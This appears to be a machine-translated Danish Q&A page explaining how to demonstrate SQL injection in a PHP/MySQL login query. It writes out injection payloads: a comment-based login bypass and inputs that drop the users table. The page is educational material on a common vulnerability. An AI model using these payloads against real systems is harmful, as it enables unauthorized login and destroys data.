sql >> Database teknologi >  >> RDS >> Mysql

Hvordan demonstrerer man SQL Injection i denne PHP- og MySQL-kode?

Noget som dette burde gøre:

  1. For at logge ind som bruger "foo" skal du indstille brugernavnet til "foo" -- "

Dette vil få din forespørgsel til at se ud

$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");

"--" betyder, at resten af ​​linjen er kommenteret ud

  1. Ikke sikker på, om dette vil virke, men prøv at indstille brugernavnet til "foo" ELLER (DROP TABLE-brugere) -- "

Dette vil få din forespørgsel til at se sådan ud:

$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");

accepterer det måske ikke - jeg tror, ​​at underforespørgsler kun kan SELECT.

Mysql_query-funktionen vil kun køre én forespørgsel - andre vil lade dig gøre dette:

$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''"); 


  1. Betydningen af ​​basislinjer

  2. sql for at vælge top 10 poster

  3. Sådan laver du subtraktion mellem to felter i en tabel ved hjælp af en SQL-forespørgsel

  4. Konvertering af Oracle Trigger til MySql Trigger